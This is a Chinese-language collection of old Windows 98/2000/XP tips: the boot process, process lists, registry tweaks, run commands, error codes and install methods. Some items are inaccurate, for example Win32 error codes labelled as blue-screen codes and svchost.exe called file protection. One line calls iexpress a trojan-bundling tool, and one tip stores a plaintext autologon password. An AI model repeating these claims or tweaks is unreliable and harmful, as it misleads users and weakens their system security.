  SFC(System Files Checker,系统文件检查器)。以管理员身份登录Windows XP,将Windows XP的安装光盘放入光驱,在“命令提示符”窗口中键入“SFC/SCANNOW”命令后回车,“系统文件检查器”开始自动扫描系统文件,而且不需要你的任何干预。不过需要提醒大家的是,尽管Windows 2000/XP下的“SFC”比Windows 98下的“SFC”聪明得多,但要想正常运行它,还得注意以下两个问题:

  1.在运行“SFC”之前必须将Windows XP安装光盘放入光驱,否则在扫描过程中会提示你插入安装光盘。即使你插入了安装光盘,系统仍会有出错提示。
  2.在Windows 2000/XP下使用“系统文件检查器”时,必须加上正确的参数才能正常运行。我们可以在“命令提示符”窗口中键入“SFC”命令查看这些参数。
  3.由于Windows 2000/XP下的“SFC”命令是完全自动执行的,因此我们无法直接知道修复了哪些系统文件。不过我们可以通过以下方法间接获得系统文件的修复情况:依次打开“控制面板→管理工具→事件查看器→系统”,根据时间提示,从列表中选定运行“SFC”时的事件,右击该事件并查看其属性即可。

二十六、Windows2000/XP启动过程详解


Windows2000/XP是一个优秀的操作系统,它功能强大,安全稳定,深受广大电脑用户青睐。但在使用过程中,我们明显地感觉到它的启动时间比Windows98要延长许多,比之Windows98更能考验人的耐性。那么在这段让人忍无可忍但又不可不忍的时间中,系统究竟做了些什么工作哪,别急,,容俺慢慢道来,咱看一看它究竟为何如此龟速。
在基于INTEL的计算机上,Windows2000/XP的启动过程大致可分为5个步骤:预启动,启动,装载内核,初始化内核以及用户登录。下面分别展开介绍:
一.预启动
首先计算机通电进行自检,并由BIOS(即基本输入输出系统)完成基本硬件配置,然后读取硬盘的MBR(主引导记录)检查硬盘分区表以确定引导分区,并将引导分区上的操作系统引导扇区调入内存中执行,此处即执行NTLDR(操作系统加载器)文件。
* Windows2000/XP支持多重启动。它在安装时会首先将已存在的其它操作系统引导扇区保存为BOOTSECT.DOS文件(位于活动分区根目录下),并修改系统引导扇区,以便系统启动时加载NTLDR文件,从而达到多重启动的目的。而Windows98则不具备这个功能,因此如果先装好Windows2000/XP后再装Windows98会破坏掉Windows2000/XP的引导记录,导致2000/XP不能启动。
二.启动
1.首先进行出始化,NTLDR会把处理器从实模式转换为32位保护模式。
2.读取BOOT.INI文件。该文件位于活动分区根目录下,它的作用是使系统在启动过程中出现选择菜单,由用户选择希望启动的操作系统。如果选择启动Windows2000/XP,NTLDR会继续引导进行以下过程;如果选择为非Windows2000/XP系统,NTLDR则会读取系统引导扇区副本BOTSECT.DOS转入启动相应系统。
* 其中[BOOT LOADER]即操作系统加载器,指定系统选择菜单默认等待时间和默认引导的操作系统。可手工修改或在控制面板中修改,为了保险起见,建议在控制面板中修改。依次选择控制面板-〉系统-〉高级->启动和故障恢复,即可更改相关设置。(在WindowsXP中还有另一种方法,即运行msconfig(系统配置实用程序)。
[OPERATING SYSTEMS]段指定操作系统列表,由双引号括起来的部分就是列表所显示的内容,可任意修改,使其更加个性化。
* 形如MULTI(0)DISK(0)RDISK(0)PARTITION(1)格式的语句被称为ARC路径,它的格式为:MULTI()——指定磁盘控制器(若为SCSI控制器,则此处应替换为SCSI());DISK()——指定SCSI设备编号(对于MULTI该处值始终为0);RDISK()——指定IDE设备编号(对于SCSI,此处被忽略);PARTITION()——指定分区编号。除分区编号由1开始外,其余编号均从0开始。
参数/FASTDETECT表示禁用串行鼠标检测,是系统默认值。还有几个常见参数:MAXMEM——指定Windows2000/XP可用内存容量;BASEVIDEO——使用标准VGA显示驱动程序;NOGUIBOOT——启动过程中不显示图形屏幕;SOS——加载设备驱动程序时显示其名称。
* 在操作系统选择菜单中的中文字体由位于活动分区根目录下的BOOTFONT.BIN文件提供。
3.系统加载NTDETECT.COM文件。由它来检测机器硬件,如并行端口,显示适配器等等,并将收集到的硬件列表返回NTLDR用于以后在注册表中注册保存。
4.如果Windows2000/XP有多个硬件配置文件,此时会出现选择菜单,等待用户确定要使用的硬件配置文件,否则直接跳过此步,启用默认配置。
* 硬件配置文件是指保存计算机特定硬件配置的系统文件。可以创建多个不同的硬件配置文件以满足计算机在不同场合的应用。可以依次选择控制面板-〉系统->硬件-〉硬件配置文件作出修改。
三.装载内核
引导过程开始装载Windows2000/XP内核NTOSKRNL.EXE。这个文件位于Windows2000/XP安装文件夹下的SYSTEM32文件夹中。随后,硬件抽象层(HAL)被引导进程加载,完成本步骤。
* 硬件抽象层(HAL):隐藏特定平台的硬件接口细节,为操作系统提供虚拟硬件平台,使其具有硬件无关性,可在多种平台上进行移植。
四.初始化内核
内核完成初始化,NTLDR将控制权转交Windows2000/XP内核,后者开始装载并初始化设备驱动程序,以及启动WIN32子系统和WINDOWS2000/XP服务。
五.用户登录
开始登录进程。由WIN32子系统启动WINLOGON.EXE,并由它启动LOCAL SECURITY AUTHORITY(LSASS.EXE)显示登录对话框。用户登录后,WINDOWS2000/XP会继续配置网络设备和用户环境。最后,伴随着微软之声和我们熟悉的个性化桌面,WINDOWS2000/XP漫长的启动过程终于完成。呵,是不是睡着了,醒醒吧,系统启动成功,您现在该干嘛就干嘛!

二十七、Windows 2000/XP 的任务管理器

Windows 2000/XP 的任务管理器是一个非常有用的工具,它能提供我们很多信息,比如现在系统中运行的程序(进程),但是面对那些文件可执行文件名我 们可能有点茫然,不知道它们是做什么的,会不会有可疑进程(病毒,木马等)。本文的目的就是提供一些常用的Windows 2000 中的进程名,并简单说明它们的用处。

??在Windows 2000 中,系统包含以下缺省进程:
??Csrss.exe
??Explorer.exe
??Internat.exe
??Lsass.exe
??Mstask.exe
??Smss.exe
??Spoolsv.exe
??Svchost.exe
??Services.exe
??System
??System Idle Process
??Taskmgr.exe
??Winlogon.exe
??Winmgmt.exe

??下面列出更多的进程和它们的简要说明

??进程名??????描述

??smss.exe?????Session?Manager
??csrss.exe ????子系统服务器进程
??winlogon.exe???管理用户登录
??services.exe???包含很多系统服务
??lsass.exe ????管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。
??svchost.exe??? Windows 2000/XP 的文件保护系统
??SPOOLSV.EXE ???将文件加载到内存中以便迟后打印。)
??explorer.exe???资源管理器
??internat.exe???托盘区的拼音图标)
??mstask.exe????允许程序在指定时间运行。
??regsvc.exe????允许远程注册表操作。(系统服务)->remoteregister
??winmgmt.exe ???提供系统管理信息(系统服务)。
??inetinfo.exe???msftpsvc,w3svc,iisadmn
??tlntsvr.exe ???tlnrsvr
??tftpd.exe ????实现 TFTP Internet 标准。该标准不要求用户名和密码。
??termsrv.exe ???termservice
??dns.exe ?????应答对域名系统(DNS)名称的查询和更新请求。
??tcpsvcs.exe ???提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000 Professional 的能力。
??ismserv.exe ???允许在 Windows Advanced Server 站点间发送和接收消息。
??ups.exe ?????管理连接到计算机的不间断电源(UPS)。
??wins.exe?????为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。
??llssrv.exe????证书记录服务
??ntfrs.exe ????在多个服务器间维护文件目录内容的文件同步。
??RsSub.exe ????控制用来远程储存数据的媒体。
??locator.exe ???管理 RPC 名称服务数据库。
??lserver.exe ???注册客户端许可证。
??dfssvc.exe????管理分布于局域网或广域网的逻辑卷。
??clipsrv.exe ???支持“剪贴簿查看器”,以便可以从远程剪贴簿查阅剪贴页面。
??msdtc.exe ????并列事务,是分布于两个以上的数据库,消息队列,文件系统或其它事务保护护资源管理器。
??faxsvc.exe????帮助您发送和接收传真。
??cisvc.exe ????索引服务
??dmadmin.exe ???磁盘管理请求的系统管理服务。
??mnmsrvc.exe ???允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。
??netdde.exe????提供动态数据交换 (DDE) 的网络传输和安全特性。
??smlogsvc.exe???配置性能日志和警报。
??rsvp.exe?????为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功功能。
??RsEng.exe ????协调用来储存不常用数据的服务和管理工具。
??RsFsa.exe ????管理远程储存的文件的操作。
??grovel.exe????扫描零备份存储(SIS)卷上的重复文件,并且将重复文件指向一个数据存储点,以节省磁盘空间(只对 NTFS 文件系统有用)。
??SCardSvr.ex ???对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。
??snmp.exe?????包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。
??snmptrap.exe???接收由本地或远程 SNMP 代理程序产生的陷阱(trap)消息,然后将消息传递到运行在这台计算机上 SNMP 管理程序。
??UtilMan.exe ???从一个窗口中启动和配置辅助工具。
??msiexec.exe???依据 .MSI 文件中包含的命令来安装、修复以及删除软件。

??总结: 发现可疑进程的秘诀就是要多看任务管理器中的进程列表,看多了以后,一眼就可以发现可可疑进程,就象找一群熟悉人中的陌生人一样。

二十八、在Windows 2000使用纯DOS的方法

有一种非常巧妙的方法可以让Windows 2000安装后也能够进入纯DOS:在安装Windows 2000前先用Windows 98启动盘启动,并通过SYS C:命令向C盘传输系统,然后按常规方法安装Windows 2000,安装成功后即可在启动菜单中在默认的Microsoft Windows 2000菜单下会多出一个Microsoft Windows项目,选中此选项就会启动Windows,但由于我们并没有安装Windows 98,所以此时会出现我们需要的DOS窗口,而且绝对是正宗的实模式。

二十九、Win2000设置技巧

许多设置涉及到注册表,请小心操作,注意备份!

对象为Windows 2000 Professional。

内存性能优化:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Memory Management 中设置 ClearPageFileAtShutdown=1。

若内存≥128M,进行如下优化:

DisablePagingExecutive键值设为1:系统正运行的文件被强制保留在内存中而非移入虚拟内存。

LargeSystemCache键值设为1:Windows 2000使用系统缓存(同Windows 9x中Vcache),使磁盘输入/输出性能有巨大提高。

系统性能优化:

1. CPU二级缓存

L2:CPU二级缓存,是CPU的一个组成部分。然而,Windows2000不对二级缓存作出检测 ,需手动设定。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\MemoryManagement\SecondLevelDataCache,值(以KB为单位)调整为所用CPU的二级缓存实际大小。

注:可选用十六进制或十进制,填入大小值应该选十进制。

2. 修改磁盘缓存

Windows2000默认的I/O页面文件比较保守。对于不同的内存,采用不同的磁盘缓存是较好的做法。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\IoPageLockLimit中,根据内存修改其十六进制值:

64M→1000;

128M→4000;

256M→10000;

512M或更大→40000。

3. IRQ中断请求

计算机的每一个主要部件都设IRQ中断号。通过修改每个IRQ请求的优先次序实现优化。这里的优化对象是系统/CMOS实时钟,通过主板来提升性能。

1)确定需要获得更高的性能的组件。

2)找到组件正在使用的IRQ中断号。系统属性→硬件→设备管理器→右击待查组件→属性→资源,可以看到设备正在使用的IRQ中断号。记录中断号。

3)HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\PriorityControl中新建DWORD双字节值IRQ#Priority(#是具体中断号),值设为1。

4)重新启动。

建议优化系统CMOS实时钟(IRQ8),改善整块主板的性能。如要撤消优化设置,只要删除设置的注册表键值。

4. 不加载DLL文件

浏览器在使用之后往往会有部分DLL文件在内存中驻留一段时间,部分内存会被无用的DLL文件占用。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer新建字符值:AlwaysUnloadDLL,值设为1。

如要去除这项优化,将该键值设为0(或删除键值)。

注意:该项优化在Windows重新启动后生效。

5. 删除多余的DLL文件

Windows2000的System和System32目录下有大量dll文件被系统或应用软件共享。经常安装卸载软件会增加dll垃圾文件,占用硬盘空间,降低系统运行速度。

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedDLLs中,存放有关软件共享的dll路径信息,每个dll文件的项值表明它已被几个应用软件共享。如果该项值为0,则说明不被任何软件共享,可以删除,然后再删除对应的dll文件。

6. 精简注册表(慎用!)

精简注册表的方法是重建注册表:

1)Windows2000下用Regedit导出整个注册表(注意:要确保导出全部注册表而非一个分支),将其存为c:\x.reg。

2)用DOS 7.0重新启动,载入磁盘高速缓存程序Smartdrv.exe以加快处理速度。

3)运行DOS版的REGEDIT:C:\Windows\regedit/c x.reg(参数/C表示从后面指定文件中重新生成整个注册表),重建的注册表文件比减小25-30%左右,达到精简目的。

7. 等待时间优化

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control中:

WaitToKillServiceTimeout设为:1000或更小。

HKEY_CURRENT_USER\Control Panel\Desktop和HKEY_USERS\Control Panel\Desktop中:

(1)WaitToKillAppTimeout改为1000,即关闭程序时仅等待1秒;

(2)HungAppTimeout值改为:200,表示程序出错时等待0.5秒;

3)AutoEndTasks值改为1,表示自动关闭停止相应的程序。

8. 快速定位鼠标

Windows 2000允许用户对鼠标的采样速率进行设定,使鼠标能更精确地移动和定位。

鼠标的采样速率设置为100Hz,输入缓冲区长度设置为300Hz。如果在设置后系统变得不稳定,改变采样速率,设置成80Hz或以下即可。

9. 快速显示菜单

Windows 2000的默认菜单显示是“淡入淡出”的效果,这种效果下,修改菜单的显示速度并不明显。

将“动画显示菜单和工具提示”效果”改为“滚动效果”。

HKEY_CURRENT_USER\ControlPanel\Desktop中MenuShowDelay项,这一项的取值范围是0~100000(单位为毫秒),将默认的值改为0或者是400。

10. 删除多余的键盘布局、输入法和区域设置

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts中,对应“控制面板”中的“键盘布局/输入法”,可直接删除未用语言的键盘布局和未用的输入法子项;

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale中,是“区域设置”,保留值不为空的项值,其它的全部删除。

11. 删除系统不用的字体和HELP文档(慎用!)

把\WINNT\Fonts整个目录打包压缩成一个文件保存。删除所有不用的字体,只保留Arial、Marlett、Micosoft Scans Serif Regular 、MingLiU & PmingLiU、Modern、MS Outlook、MS Serif 8,10,12、Script、SimSun & NsimSun、Tahoma、Times New Roman、宋体、仿宋、楷体、黑体几个字体。需要其它字体时解压对应的字体到Fonts目录中。

12. 在“运行”中添加“在单独的内存空间中运行”的选项

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer中,新建DWORD型MemCheckBoxInRunDlg,值设为1。

注:默认情况下,所有16位程序都在单一共享的 VDM (虚拟DOS机器)进程中作为线程运行。这种情况下,这些程序共享分配给 VDM 进程的内存空间,因此不能同时运行。所作设置就是允许用户在专用的(不是共享的)VDM进程中运行16位程序。复选框只在用户在输入16位程序时才被启用。

启动优化:

1.取消系统检测串口

打开 Boot.ini 文件,如下修改:

[operating systems]

multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows 2000 Professional" /fastdetect/NoSerialMice

启动时不检测行串口,缩短启动时间。

2. 快速启动

multi(0)disk(0)rdisk(0)partition(2)\WINNT="Microsoft Windows 2000 Professional" /fastdetect

改为:multi(0)disk(0)rdisk(0)partition(2)\WINNT="Microsoft Windows 2000 Professional" /nodetect

HKey_Local_Machine\System\ControlSet001\Control中,SystemStartOptions键值改为nodetect

3.关闭无用服务

运行→Services.msc→Windows2000服务的详细列表。

Windows 2000服务设置

4. 加快启动和减少故障恢复时间

减少Windows2000系统启动时显示操作系统列表的时间。如果不是网络系统管理员,可以去掉“将事件写入系统日志”和“发出管理警报”两个选项,并将“写入调试信息”设置为“无”。

5. 删掉不需要的组件

(1)去除文件夹选项的文件隐藏、只读等属性;

(2)\WINNT\inf文件夹,用记事本打开sysoc.ini文件,替换“,hide”为空,保存退出。控制面板→添加/删除程序→添加/删除Windows组件,根据需要修改。

6. 屏蔽CD自动播放

启动时,打开CD自动播放功能会延缓启动速度。运行→gpedit.msc→管理模板,设置是否自动播放CD。

7. 快速登录计算机系统

系统属性→网络ID→网络标识→根据“网络标识向导”操作。

设置时注意:选择“本机用于家庭,不是商业网络的一部分”,以及“Windows始终假设下列用户已登录到本机上”。

HKEY_LOCAL_MACHINE\Software\Microsoft\WinNT\CurrentVersion\Winlogon中,

(1)AutoAdminLogon值改为“1”

(2)DefaultDomainName值改为所要登录的域名或本机计算机名

(3)DefaultUserName值改为自动登录的用户名

(4)DefaultPassword值改为密码。(注意:这几个都是字符串值。)

如果想临时取消自动登录或者需要以其他用户名登录,在启动时按住Shift键。

8. 加快Explorer启动速度

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Explorer\RemoteComputer\NameSpace中:

删除{D6277990-4C6A-11CF-8D87-00AA0060F5BF} (计划任务)

9. Windows 2000启动盘制作:

(1)Windows 2000 启动盘:d:\bootdisk\makeboot a:

(2)Windows 2000 引导盘:ntldr,ntdlect.com,boot.ini,IO.sys

(3)Windows 2000 紧急修复磁盘(ERD):ntbackup.exe

三十、Windows常用命令集

winver---------检查windows版本
wmimgmt.msc----打开windows管理体系结构(wmi)
wupdmgr--------windows更新程序
w脚本--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------xp自带局域网聊天


mem.exe--------显示内存使用情况
msconfig-----------启动
msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令

dxdiag---------检查directx信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开dde共享设置
dvdplay--------dvd播放器

nslookup-------ip地址侦测器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(tc)命令检查接口

syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护(扫描错误并复原)

tsshutdn-------60秒倒计时关机命令
tourstart------xp简介(安装完成后出现的漫游xp程序)
taskmgr--------任务管理器 (2000/xp/2003)

eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器


packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器

regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消zip支持

cmd.exe--------cmd命令提示符
chkdsk.exe-----chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------sql server 客户端网络实用程序
clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序

osk------------打开屏幕键盘
odbcad32-------odbc数据源管理器
oobe/msoobe /a----检查xp是否激活

lusrmgr.msc----本机用户和组
logoff---------注销命令

iexpress-------木马捆绑工具,系统自带

fsmgmt.msc-----共享文件夹管理器

utilman--------辅助工具管理器

gpedit.msc-----组策略

三十一、Windows蓝屏代码

使用Windows出现蓝色屏幕是经常的事,而且每每因为不清楚错误的来源而频繁重新安装系统,劳神费时。下列收集了一些Windows死机密码,供大家参考。
0x0000 操作完成

0x0001 不正确的函数

0x0002 系统找不到指定的文件

0x0003 系统找不到指定的路径

0x0004 系统无法打开文件

0x0005 拒绝存取

0x0006 无效的代码

0x0007 内存控制模块已损坏

0x0008 内存空间不足,无法处理这个指令

0x0009 内存控制模块地址无效

0x000a 环境不正确

0x000b 尝试载入一个格式错误的程序

0x000c 存取码错误

0x000d 资料错误

0x000e 内存空间不够,无法完成这项操作

0x000f 系统找不到制定的硬盘

0x0010 无法移除目录

0x0011 系统无法将文件移到其他的硬盘

0x0012 没有任何文件

0x0019 找不到指定的扇区或磁道

0x001a 指定的磁盘或磁片无法存取

0x001b 磁盘找不到要求的扇区

0x001c 打印机没有纸

0x001d 系统无法将资料写入制定的磁盘

0x001e 系统无法读取指定的装置

0x001f 连接到系统的某个装置没有作用

0x0021 文件的一部分被锁定

0x0024 开启的分享文件数量太多

0x0026 到达文件结尾

0x0027 磁盘已满

0x0036 网络繁忙

0x003b 网络发生意外的错误

0x0043 网络名称找不到

0x0050 文件已经存在

0x0052 无法建立目录或文件

0x0053 int24失败

0x006b 因为代用的磁盘尚未插入,所以程序已经停止

0x006c 磁盘正在使用中或被锁定

0x006f 文件名太长

0x0070 硬盘空间不足

0x007f 找不到指定的程序

0x045b 系统正在关机

0x045c 无法种植系统关机,因为没有关机的动作在进行中

0x046a 可用服务器储存空间不足,无法处理这项指令

0x047e 指定的程序需要新的Windows版本

0x047f 指定的程序不是Windows或MS-DOS程序

0x0480 指定的程序已经启动,无法再启动一次

0x0481 指定的程序是为旧版的Windows所写的

0x0482 执行此应用程序所需的程序库文件之一毁坏

0x0483 没有应用程序与此项操作的指定文件建立关联

0x0484 传送指令到应用程序发生错误

0x04b0 指定的装置名称无效

0x05a2 窗口不是子窗口

0x05aa 系统资源不足,无法完成所要求的服务

0x05ab 系统子还不足,无法完成所需要的服务

0x05ac 系统资源不足,无法完成所要求的服务

0x06b9 资源不足,无法完成操作

三十二、巧妙安装各种Windows操作系统

对于新购置的电脑,在完成对硬盘的分区、格式化操作以后,就需要进行Windows系统的安装了。下面就来介绍一下Windows各种版本的安装方法。

  安装Windows 98

  新安装Windows 98系统,可以使用Windows 98系统启动盘启动计算机,然后将Windows 98安装光盘放入光驱,在DOS提示符状态下,进入光盘所在驱动器,然后进入Windows 98安装目录,运行Setup命令即可开始安装Windows 98。

  在开始安装时,安装程序会自动调用Scandisk程序对电脑系统进行检测,检测通过后即进入Windows 98安装程序。当屏幕上出现“软件许可协议”对话框时,单击选中“接受协议”选项并单击“下一步”按钮,这时会要求你输入“产品密钥”,也就是我们常说的Windows 98安装序列号,完成后单击“下一步”按钮进行安装。

  Windows 98安装程序进入“正在收集计算机的相关信息”界面,并对系统进行检查,以确保有足够的硬盘空间来安装Windows 98。完成后,即可按照提示,单击“下一步”按钮,选择“典型安装”方式,输入用户名和单位名称后,进入用户区域选择窗口,区域的选择主要是确定操作系统的系统时间以及日期,可以在列表中选择“中国”,然后单击“下一步”按钮。

  在安装过程中,安装程序会询问用户是否创建启动盘,如果你还没有自己的Windows 98启动盘,那么建议选择“确定”按钮创建,否则单击“取消”按钮。在接下来的过程中,就不必我们为之操心了,安装程序会向硬盘拷贝数据,并完成最后的安装过程。文件复制结束后,会提示重新启动计算机,重启后,即可直接进入Windows 98安装程序,并在左侧显示安装剩余时间,耐心地等待过后,你就会发现,Windows 98已经被安装到系统中了。

  小技巧:

  往往我们在安装Windows 98时,通常会在命令行状态下输入Setup命令进行安装,然后运行Scandisk、扫描磁盘、制作启动盘、安装版本说明等过程,如果打算要Windows快些安装,可以在使用Setup命令的时候,使用一些参数,从而达到快速安装Windows 98的目的。Setup的参数主要包括以下几个参数:

  /t:tmp:指定存放临时文件的目录

  /id:跳过磁盘空间检查

  /ie:不制作启动盘

  /ih:不检查注册表

  /im:跳过内存检查

  /is:不执行磁盘扫描

  /iv:安装时不显示版本说明

  我们想快速安装Windows 98,就可以输入命令:setup /id/ie/ih/im/is/iv,这样安装程序就会直接进入文件复制过程,从而省下了大量的安装时间。

  安装Windows Me

  Windows Me的安装可分为升级安装和完全安装两种类型,Windows Me可以从Windows 95、Windows 98和Windows 98 SE上直接升级安装,但不能从Windows 3.x中升级。

  Windows Me提供了三种安装方式,一是使用启动盘启动计算机,并进入安装目录执行Setup程序,需要注意的是,在执行安装程序之前,需要首先运行和加载磁盘高速缓存程序Smartdrv.exe。第二种方式是使用Windows Me光盘启动,自动执行安装程序。第三种方式是,在当前的操作系统中运行Windows Me的安装程序,比如在Windows 98系统中直接运行安装程序。

  无论采用哪种安装方式,其操作过程基本都是一样的,与前面介绍的Windows 98安装程序类似。

  如果你的电脑主频低于150MHz,那么会出现“在计算机上无法安装Windows,因为处理器低于150MHz,单击‘确定’退出安装程序”的提示,这时不要着急,可以输入命令:setup/nm即可开始安装了。

  另外,Windows Me的安装程序也存在一些参数(同Windows 98)。

  安装Windows 2000和Windows XP

  Windows 2000系统的安装可以在DOS和Windows 9x系统下直接安装,在光驱中放入Windows 2000安装盘后,会自动运行Windows 2000安装程序。选择全新安装后,会要求输入产品序列号,然后即可开始复制安装文件并重新启动计算机。

  在重新启动后的界面中,按下回车键则可以开始安装Windows 2000,并进入安装目录选择窗口,同时选择需要安装的盘符。在接下来的窗口中,会要求选择文件系统的格式,为了可以高效发挥Windows 2000系统性能,建议选择“将磁盘分区转换为NTFS”,完成后按下回车键即可根据向导提示完成Windows 2000系统的安装了。

  Windows XP安装方式包括三种,分别是升级安装、双系统共存安装和全新安装。它的安装方法与Windwos 2000系统安装方法类似,这里就不多做介绍了。

  如果是在DOS方式下安装Windows 2000/XP系统,首先需要运行Smartdrv.exe命令,这样才能使安装程序可以快速地安装,否则等待的时间将是非常漫长的。

  首先,我们用Windows 98启动盘启动电脑进入DOS模式,再执行Smartdrv.exe(如果软盘里没有该文件,可以从Windows 98的安装目录下的Command目录中获取)即可载入。然后执行Windows 2000/XP安装光盘中的i386目录下的Winnt.exe文件,记住:这里不是执行Setup.exe,而是Winnt.exe。以后的操作就比较简单了。

  安装多个操作系统

  在电脑中同时安装Windows 98和Windows 2000系统,可以首先安装Windows 98,然后在Windows 98系统中运行Windows 2000安装程序,这样就可以在计算机启动界面出现多重启动菜单,移动上下光标键并回车后即可选择进入相应的系统了。如果你打算让Windows Me系统与Windows 2000共存,最简单的方法是先安装好Windows Me,然后用Windows 98启动盘或者从光盘启动,安装Windows 2000,安装时选择“全新安装”方式。

  如果你打算让Windows 98、Windows 2000和Windows XP共存,可以首先安装Windows 98,然后在Windows 98下安装Windows 2000系统,最后在Windows 2000下安装Windows XP系统,在完成安装后即可形成多重启动菜单了。


三十三、windows下的EXE文件大揭密

当我们安装完Windows后,其中的文件到底是执行何种任务?某特定任务又由哪个文件来执行呢? 还有,从“开始”——“程序”——再点击“我所要执行的任务”,这种套数还真有点繁琐。 若是知道经常要执行的任务是哪个文件、位于何处?把它在桌面上建立一快捷方式,岂不省时 省力又方便!这就需要对Windows下的可执行文件明明白白。(注:若是以下所述的可执行文件 不在Windows安装目录下,可能是因为你没有安装,可到“控制面板”——“添加/删除程序” ——“Windows安装程序”,选取所要安装的组件。
本文假设Windows98安装在“C:\windows”下.
C:\Windows下的可执行文件
accstat.exe windows 辅助状态指示器
arp.exe tcp/ip地址转换协议命令
calc.exe 计算器应用软件
cdplayer.exe cd播放器附件
cleanmgr.exe 磁盘清理程序
clipbrd.exe 剪贴板查看应用程序
command.com ms-dos方式
control.exe 控制面板应用程序
cvt1.exe fat32转换器
defrag.exe 磁盘碎片整理应用程序
drvspace.exe 磁盘空间管理应用程序
dialer.exe 电话拨号程序
directcc.exe 直接电缆连接
explorer.exe 资源管理器
extrac32.exe windows cab 文件解压缩应用程序
fontview.exe 字体查看程序
filexfer.exe microsoft文件传输应用程序
finger.exe 用于获得来自于运行标准finger服务的任何系统的用户信息
freecell.exe 空当接龙游戏
grpconv.exe 程序组转换器
hostname.exe 返回tcp/ip配置窗口的dns标题头窗口中定义的计算机名字
ipconfig.exe 快速浏览系统tcp/ip配置应用程序
kodakprv.exe 映像预览应用程序
mplayer.exe 媒体播放机
mshearts.exe 红心大战游戏
nbtstat.exe 显示tcp/ip上的netbios(netbt)的状态
net.exe 一个非常全的网络配置、显示网络信息的命令,有详细帮助
netstat.exe 用于检查所有tcp、ip以及udp连接的统计情况
netdde.exe windows 网络dde(动态数据交换)
netwatch.exe 网络监视器
notepad.exe 记事本应用程序
packager.exe 对象包装应用程序
pbrush.exe 画笔应用程序
ping.exe 检测网络远端主机是否存在及判断网络是否正常的检测工具
progman.exe windows3.x中的程序管理器
qfecheck.exe 更新信息工具
regedit.exe 注册表编辑器
route.exe 用于管理本地tcp/ip路由表的应用程序
rsrcmtk.exe 显示资源状况
rundll32.exe 将dll作为应用程序运行
scandskw.exe 磁盘扫描应用程序
smartdrv.exe smartdrive(dos磁盘缓冲器)应用程序
sigverif.exe microsoft 签字应用程序
sndrec32.exe 录音机附件
sndvol32.exe 音量控制
sol.exe 纸牌游戏
sysmon.exe 系统监视器
taskman.exe 任务执行栏应用程序
taskmon.exe 任务监视器应用程序
telnet.exe 虚拟终端程序
tftp.exe 小文件传送协议,允许将文件传送给tftp服务器
tracert.exe 决定用户的系统与目标系统之间的路径
tuneup.exe windows 调整向导
vcmui.exe 版本冲突管理器
wangimg.exe 映像应用程序
welcome.exe 欢迎光临widows实用程序
winfile.exe windows3.x中的文件管理器
winhelp.exe 16位的windows 帮助程序
winhlp32.exe 32位的windows 帮助程序
wininit.exe windows 安装初始化应用程序
winipcfg.exe tcp/ip 配置实用程序
winmine.exe 扫雷游戏
winpopup.exe windows 弹出式消息实用程序
winver.exe 显示windows 版本号
write.exe 写字板附件
winrep.exe windows 报告工具
winalign.exe 排列本地文件应用程序
wupdmgr.exe windows 更新工具

三十四、{XP去除开机登陆画面!)

在进入Windows XP桌面之前,每次都会出现一个用脑登录界面,要求我们输入用户名与密码,可以加大了系统的安全性,也为多人共用一台电脑提供了方便,但如果是家用电脑,只有你一个人使用,这样每次密码,的确不有点不大方便。我们可以通过修改注册表来实现XP的自动登录。

